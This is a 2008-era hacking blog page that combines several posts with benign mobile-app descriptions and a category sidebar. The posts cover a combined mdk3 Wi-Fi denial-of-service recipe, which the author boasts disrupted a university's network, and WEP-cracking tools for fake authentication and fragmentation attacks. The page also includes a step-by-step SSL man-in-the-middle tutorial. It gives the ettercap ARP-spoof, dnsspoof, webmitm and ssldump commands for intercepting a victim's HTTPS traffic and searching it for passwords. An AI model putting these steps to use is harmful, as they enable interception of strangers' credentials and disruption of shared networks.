It's a combination of different attacks.
Cisco still has a bunch of support tickets running.
Their Intrusion Detection System crashed because of this special attack.
And with the IDS the routing tables at the whole university got mixed up for
about half an hour.
So, TRY THIS AT HOME, but not anywhere else.
The combination is:
- Running beacon flood mode to generate fake APs with the same name as your
victim
- Auth-DoS the original AP with intelligent mode
- Use the amok mode to kick the clients
And for the next version of mdk3
- Use the upcoming WIDS confusion mode to cross-connect kicked clients to
real and fake APs making all security systems go FUBAR.
In this 802.11-hell, there should be nobody able to access the network.
Because:
-> They get kicked when they connect (Amok mode)
-> They will see thousands of APs, unable to know which is the one to connect,
thus they are just trying around blindly (beacon flood)
-> The original AP may be too busy to handle the real clients because of the
Auth-DoS
Fake Shared Key Authentication
This is world's first fully functional code to enable fake authentication on networks using Shared Key Authentication. You do NOT need to know the key to authenticate, all you need is a keystream that has been chopped with aireplay-ng's chopchop attack. Hirte, another developer from the aircrack-ng community successfully included this code into the aircrack suite.
Fixed in Version 0.2:
- Show error when network does not use Shared Key Authentication
- Get Capability Field from Beacon Frame. (Using the standard capabilities failed for some APs)
ska-0.2.tar.bz2
ska-0.1.tar.bz2
Fragmentation Attack
And another world premiere from me. First implementation of the Fragmentation Attack on Linux. This attack needs a special driver and card, that is able to handle the IEEE802.11 fragmentation correctly, your driver may not work or may need to be updated/modified. The output of this tool is a file in the aircrack-ng keystream format (.xor). The output can be used in the same way like the output of the chopchop attack in aireplay-ng. With that keystream you can build an ARP packet (arpforge-ng or for the 0.6.2 release packetforge-ng). This packet can then be injected into the target wifi system, generating either answers and/or replies increasing the IV count. For an example attack, see the README in the tarball. afrag has already been integrated into aireplay-ng, best idea is to get the aircrack-ng SVN version for the newest fragmentation attack code.
afrag-0.1.tar.bz2
Search Hacking Mode Trick Updates
Mdk3 Secret Destruction Mode
Sniffing SSL traffic using MITM attack / ettercap, fragrouter, webmitm and dnsspoof.
First thing is to get fragrouter. I don't know if you can use other tools provided with the backtrack, there are 100 ways to skin a cat and this is just my way.
http://packetstormsecurity.nl/UNIX/IDS/nidsbench/fragrouter.html
There are lots of things that you can do with fragrouter but we are going to use fragrouter to setup IP forwarding.
We do this with this command :
Code:
fragrouter -B1Squash that window and put it to one side. Now open another shell and we will start dnsspoof with this command
Code:
dnsspoof -i ath0 (or whatever network interface you are using)Again put that window to one side and lets load up webmitm. Webmitm will issue our ssl cert to the victim so we can decrypt the traffic we capture.
Start webmitm by typing
Code:
webmitm -dNow we can start the arp spoof. To start ettercap type
Code:
ettercap -T -M arp:remote /router addy/ /victim addy/Ok now we are rolling next thing is to sniff the traffic. There are a few things you can do know like using ettercap filters and adding urls from metasploit, (Maybe next tut ) and lots of other things. But we are intrested in the ssl traffic so I use wireshark to save the data into a .cap file.
You can find wireshark in Backtrack >>> Privilege Escalation >>> Sniffers.
Now we have loaded wireshark lets start capturing packets. Go to Capture >>> Options and setup what network card you are using and then hit start.
Ok you should now be capturing packets addressed to your victims addy. Once you have captured enough, stop wireshark and save the data to your root directory.
Now to decrypt the SSL data.
You should first download ssldump:
http://www.rtfm.com/ssldump/
ssldump is going to decrypt our sniffed ssl data using our fake ssl cert we issued to the victim. We do this by opening up a shell and typing:
Code:
ssldump -r your.cap -w webmitm.crt -d > outAnd you are done, all the ssl data will be saved to a file called out in your root dir. Use what you like to search it for passwords etc.
by Dr_GrEeN
ssldump
ssldump is an SSLv3/TLS network protocol analyzer. It identifies TCP connections on the chosen network interface and attempts to interpret them as SSLv3/TLS traffic. When it identifies SSLv3/TLS traffic, it decodes the records and displays them in a textual form to stdout. If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic.
ssldump 0.9b3
The current version is 0.9b3
ssldump 0.9b3 contains a number of fixes and enhancements over 0.9b2, including.
Security fix: some potential over and underflows
Added support for VLANs.
Added -P flag to disable promiscuous mode. Fixed bugs in the TCP reassembly code.
A lot of bug fixes.
Nokia Energy Profiler 1.1
Nokia Energy Profiler is a stand-alone test and measurement application for S60 3rd Edition, Feature Pack 1 devices (and onwards). The application allows developers to test and monitor their application’s energy usage in real time in the target device.
The application is available as a SIS package for S60 3rd Edition devices, but measurement works only in S60 3rd Edition, Feature Pack 1 (or newer). Older devices can still view files.
This view shows the cellular signal levels as RX and TX levels. RX level corresponds to the power of the received cellular signal. TX level refers to the transmission power from the cellular radio. Both measures are in dBm. TX levels show up only during active transmission periods (voice or data). RX levels are available whenever connected to a cellular network. This means there is no RX level in the Offline phone profile. Average/instant bar values are for the selected signal that is shown in the corner indicator. You can toggle the chosen signal with the [6] key. Unlike all the other views, the zero y-axis is in the bottom of the screen. RX levels are typically between -30 to -120 dBm (a lower value means poorer signal), whereas TX levels are positive dBm (a higher value means more power).
FTD FieldTest NetMonitor S60v3 SymbianOS9.1/9.2
Description:
FTD is netmonitoring mobile network application mobile devices.
Full GSM signaling which can be visible to network operator:
Information on the serving cell:
- Hoping, Channel carrier number, RX level, TX power levels, Rx quality, Time Slot, Timing advance, Radio Link Timeout, C1, C2, Currently used band, Type of current channel...
Information on the 1st, 2nd, 3rd, 4th, 5th, 6th, 7th, 8th neighbours.
Network selection display.
System information bits for the service cell.
Paging repeat period, TMSI, periodic location update.
Network parameters.
Ciphering, hoping DTX status and IMSI.
Uplink DTX switching display.
BTS-TEST carrier: lock / unlock on one BTS frequency.
Toggle cell barred status.
Select which band to use: GSM 900 - GSM 1800 - GSM 1900
Full GPRS signaling displays:
Information on the current GPRS state and previous TBF configuration:
- Hoping, Channel carrier number, RX level, Timing advance, Downlink time slot, Uplink time slot, Channel coding scheme downlink/uplink, Timing advance index, TFI and MAC mode for TBF config, Type of current channel, UFS values...
Previous UL TBF establishment.
Information on the GMM state.
Values of P-TMSI, RAC, SMS radio priority, Ciphering and Non-DRX parameters.
GPRS Network parameters.
Packet control channel parameters.
Packet system information parameters.
GPRS information on the serving cell and neighbors..
And many more...
Installation notes:
Copy/Move
FtdApp_reg.rsc to C:/Private/10003a3f/import/Apps
Copy/Move
Ftd.mbm, Ftd.mif, ftd.rsc, Ftd_aif.mif, ftdata_wk15_07.dat, ftdata_wk41_06.dat, Alarm.rsc, AlarmList.mbm, CallEnd.rsc, Custom.rsc to C:/Resource/Apps
Copy/Move
ftd.dll55l to C:/Resource/Plugins
Copy/Move
FTD.exe, FtDaInterface.dll, ftdaserver.exe, FtDbInterface.dll, ftdbserver.exe, FtdGwcTest.exe, FtEngine.dll to C:/Sys/Bin
For application icon in SymbianOS 9.1 use the file in attachment.
Tested on
N73, N95, N95 8GB, 6120c, 6290, 5700, E65, E51, E90.
Compatibiltiy:
Should work on all S60v3 devices
JoikuSpot Light v2.1 Beta S60v3 SymbianOS [Updated - 31st July '08]
JoikuSpot is FREE and SECURE Mobile HotSpot solution that turns Nokia phones to a WLAN HotSpot.
JoikuSpot software is installed directly to the phone. When switched on, laptops and iPods can establish instant, secure and fast WLAN connection via smartphone's JoikuSpot HotSpot using phone's own 3G internet connection.
Multiple devices can connect to JoikuSpot in parallel and seamlessly share the same 3G internet connection.
You can use JoikuSpot to access internet e.g. on the train, car, sailing boat, summer cottage, hotel, while walking, or when at remote office...where ever you are!
Release notes for JoikuSpot Light:
-Landing page works with all operators
-Encryption support with WEP including 128bit key generator
-Battery threshold shutting down the client when battery level is too low
-Default Access point setting
-Support for secure SSH tunnels with Putty
-MapSpot 1.0 support for GPS HotSpot location identification with external mapping services such as Google Maps
All settings can be adjusted after JoikuSpot is stopped, just press the Stop key.
Please uninstall the previous version before updating your JoikuSpot. Just go Tools --> Application management on your Nokia phone.
JoikuSpot works with Nokia S60 3rd Ed phones. For Windows Mobile version, please download WMWifiRouter.
JoikuSpot requires that you have a working Internet connection in the phone. WAP connection sharing is NOT supported.
Please make sure that you have the latest firmware on the phone. You can easily update it with Nokia Software Updater.
JoikuSpot Light supports HTTP and HTTPS protocols. This means that you can browse web and also secure sites (webmails, banks). HTTPS requires that "Automatic proxy configuration" is set on your web browser. See User guide for easy setup.
Other protocols such as IMAP (mail) or FTP are not part of Light Edition. We will soon launch a commercial Premium Edition with full protocol support. Light Edition will continue to stay free.
HTTPS settings for Apple iTouch:
Go Settings --> Wi-fi and select JoikuSpot network. Go to bottom and set HTTP proxy to Auto. TIP for some phone models and iTouch combinations:
Try auto configuration url http://192.168.2.1/wpad.dat or set HTTPS proxy as 192.168.2.1 port 80
Known issues:
-JoikuSpot has been tested successfully with several laptops: Fujitsu-Siemens, Apple Macbook, Dell, HP and new IBM models seem to work well. Older laptops might have an issue with the WLAN chipset.
-PSP and Nintendo DS require WLAN infrastructure mode and
Symbian does not support it yet. We are looking into it and discussing with Symbian.
-If you have firewall program installed in your smartphone (F-Secure Mobile Security e.g.), try lowering the security level. We shall do a fix for this to final version.
-Some operators (at least in UK) require that you have to go to their store and prove that you are over 18 in order to browse the web. Otherwise you will be limited just to their own sites. This in not a bug in JoikuSpot, it also applies to all web surfing. Try accessing the web through 3G first with phone's web browser to see if your access is limited.
Counter measurements of FTE against copying their Bluetooth sniffer
FTE is finally reacting on the fact that you can easily copy their Comprobes firmware to other, regular Bluetooth USB dongles. First, with their new hardware they released earlier this year, also the structure of the firmware has changed. Therefore the newer firmware wont work out of the box the good old way.
Second they seem to have changed their licensing policy. You have to register your software (with your license key) of FTE4BTonline. And, that’s the funny thing, seems that you also have to ‘de-register’ your software online. Means: when you want to install your software somewhere else, de-install it on the other PC and ‘de-register’ it online. Then install it on the other PC.
source: http://www.evilgenius.de/
Post Friends Link
CATEGORY
- aircrack (1)
- Airdecloak-ng (1)
- AiroWizard (1)
- Airtun-ng (1)
- Application Patching (1)
- Arpwatch (1)
- backtrack (23)
- Backtract DOWNLOAD (2)
- Beer Pong Table (2)
- Bluetooth (2)
- Cain (1)
- cracking (2)
- Download Airowizard Manual (1)
- Dual Boot (1)
- Easside-ng (1)
- Email Spoofing (1)
- Ettercap (1)
- Exploit Hacking (1)
- Fast-Track (1)
- Gateway (1)
- Generator (1)
- hacking (26)
- Hacking Basics (1)
- handphone (8)
- HUAWEI (1)
- Huawei EC506 (1)
- Injection (1)
- Intel Wireless Wi-Fi 5100 Card injection OK (2)
- Introduction (1)
- Local Password Cracking (1)
- Lock Picking (3)
- Lock Picking Basics (1)
- McAfee (1)
- Metasploit Autopwn (1)
- nokia (1)
- Packet Injection wifi Intel 4965 AGN (1)
- Packetforge-ng (1)
- Panen Password (1)
- Password (1)
- phising (1)
- phone hacking (3)
- Phone Phreaking (1)
- Recovering an Acer Computer (1)
- SIUC’s Network (1)
- Sniffing VoIP (1)
- Snipper (2)
- Spoonwep2 (1)
- Sql Injection (3)
- ssldump (1)
- Staying Secure - SSH Tunnel (1)
- t (1)
- TCP / IP (3)
- The 60 Minutes Effect (1)
- Tkiptun-ng (2)
- Tool Spoonwpa Wpa Key (1)
- trik (12)
- Triple Boot (1)
- tutorial (9)
- ubuntu (1)
- usb (2)
- USB Worm (Jamesgo.dll) (1)
- video (10)
- Website Hacking (2)
- Wesside-ng (1)
- Wi-Fi (9)
- windows (5)
- wireless (9)
- Wireless 3945ABG (2)
- WPA (1)
- WPA wireless encryption cracked (1)
- XSS Tunnel (1)
Archive
-
▼
2008
(105)
-
▼
December
(48)
- Wireless Hacking - Cracking WEP
- Wireless Hacking - DeAuth
- Lock Picking - Bump Key
- Phone Phreaking - Beige Box
- Phone Phreaking/Network Hacking - Sniffing VoIP
- Lock Picking - DIY Padlock Shims
- Lock Picking - Mult-Disc Combo Locks
- Local Privilege Escalation Vulnerability in Cisco ...
- Hacking Basics - MD5
- Website Hacking - Sql Injection
- Hacking Basics - Backtrack
- How to use Intel Pro/Wireless 3945ABG in Backtrack 2
- How to use Intel Pro/Wireless 3945ABG in Backtrack 2
- Sql Injection Challenge!
- Sql Injection Challenge How-to
- SIUC’s Network
- Infinity Exists Featured On 60 Minutes
- Website Hacking - XSS
- The 60 Minutes Effect
- Exploit Hacking
- USB Worm (Jamesgo.dll)
- Staying Secure - SSH Tunnel
- Wireless Hacking - Cracking WPA
- Singing Tesla Coil
- McAfee SiteAdvisor
- Tapping a 66 Block Telephone Network Interface
- Triple Boot - Windows, Backtrack, & Ubuntu
- Dual Boot - Windows & Backtrack
- Local Password Cracking
- Introduction
- Lock Picking Basics
- Email Spoofing
- Metasploit Autopwn
- Recovering an Acer Computer
- Application Patching
- Ettercap
- Windows SMB Relay Exploit
- Beer Pong Table
- Beer Pong Table
- XSS Tunnel
- Password Phishing
- Bypass Cisco Clean Access & Cisco NAC Appliance
- Manipulating Windows User Accounts
- Manipulating Windows User Accounts
- Episode 12 - Hacking Basics - Backtrack
- List of compatible adapters BackTrack
- Perintah untuk Hacking Wi Fi (BackTrack)
- Hacking tools: A new version of BackTrack helps et...
-
▼
December
(48)